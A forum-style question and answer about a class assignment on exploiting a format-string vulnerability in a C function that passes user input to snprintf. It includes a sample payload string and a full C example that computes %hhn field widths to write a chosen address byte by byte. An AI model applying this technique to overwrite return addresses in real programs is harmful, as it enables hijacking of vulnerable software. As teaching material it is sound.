This is an assignment but I am having problems with the basic understanding.
The vulnerable code:
#include <stdio.h>

int choc(char *arg)
{
    char buf[400];
    /* arg is passed directly as the format string, so whoever controls
       arg controls the conversions snprintf performs (the bug being exploited) */
    snprintf(buf, sizeof buf, arg);
    return 0;
}
I understand that arg needs to be a format string which will overwrite the return address with the address of the code I want to execute. But I am having trouble creating the format string.
So, things which the format string needs to have:
In order to get the return address, I just need to look at the address of the 'ret' instruction in gdb, right? What exactly is the purpose of the %x? And how do I encode the address of the code I want to execute in the format string?
A test I did: Using gdb I found that the address of my buf is 0xbffffba0. I generated arg to be "\xa0\xfb\xff\xbf_%x.%x.%n". Shouldn't this write some value to the start of buf at the address 0xbffffba0? However, I get a segfault. What am I doing wrong?
Any help would be appreciated!
The "\xa0\xfb\xff\xbf" should not be the address of buf, but rather the location of the return address on the stack (which is the value you wish to overwrite). You'll have to find that value using gdb.
You then need to put enough %x in your format string such that your %n will read that value off the stack and write to the address you specified. You also need to use the correct field sizes such that %n will actually write the correct value.
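The "correct field sizes" part of the answer is the piece people usually get wrong, so here is an added example (not the answerer's code, and not from the original post) showing how the width of each conversion steers what %n stores. It writes an arbitrary 32-bit value, such as the 0xbffffba0 from the question, one byte at a time with four %hhn conversions in a single format string; %hhn stores only the low byte of "characters printed so far", so the running total is driven to each wanted byte in turn, which is what makes large values like a return address reachable with a few hundred characters of output instead of billions. One assumption is made for determinism: the pointer %hhn writes through is handed to snprintf as an explicit argument instead of being read off the stack through a run of %x skips, because where the varargs live relative to the buffer depends on the ABI and compiler. In the real payload the pointers are the address bytes you place at the front of the buffer.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Write `value` into *target using four %hhn conversions in ONE format
 * string, the way a real payload does.  Each %hhn stores the low byte of
 * the number of characters printed so far, so the width of the %*x in
 * front of it is chosen so the running total lands on the wanted byte.
 * Returns the total number of characters the format string produced.
 *
 * Assumption (this example only): the target pointer is passed as an
 * explicit snprintf argument rather than read off the stack via %x skips.
 */
static int format_write32(uint32_t value, uint32_t *target)
{
    signed char *p = (signed char *)target;  /* %hhn takes signed char * */
    char scratch[4096];                      /* >= 4 * 256 + 1 characters */
    int pad[4];
    int total = 0;

    for (int i = 0; i < 4; i++) {
        /* little-endian: byte 0 of the value goes to the lowest address */
        int want = (int)((value >> (8 * i)) & 0xff);
        /* choose pad so (total + pad) % 256 == want; %*x always prints at
         * least one character, so a zero distance means a full 256 more */
        pad[i] = (want - total % 256 + 256) % 256;
        if (pad[i] == 0)
            pad[i] = 256;
        total += pad[i];
    }

    /* The format is a string literal (read-only memory), so glibc's
     * FORTIFY refusal of %n in a writable format string does not trigger. */
    snprintf(scratch, sizeof scratch,
             "%*x%hhn%*x%hhn%*x%hhn%*x%hhn",
             pad[0], 0u, p + 0,
             pad[1], 0u, p + 1,
             pad[2], 0u, p + 2,
             pad[3], 0u, p + 3);
    return total;
}

/* Perform the write into a local slot that stands in for the saved return
 * address and hand back what ended up there. */
static uint32_t demo_write(uint32_t value)
{
    uint32_t slot = 0;
    format_write32(value, &slot);
    return slot;
}

int main(void)
{
    uint32_t slot = 0;
    int n = format_write32(0xbffffba0u, &slot);
    printf("slot now holds 0x%08x after %d characters of output\n", slot, n);
    return slot == 0xbffffba0u ? 0 : 1;
}
```

For 0xbffffba0 the computed widths are 160, 91, 4 and 192 (running totals 160, 251, 255 and 447, whose low bytes are a0, fb, ff and bf), so the whole write costs 447 characters of output. If you try to do it with a single %n instead, the width has to equal the entire value, which is why a one-shot write of a stack address is not practical.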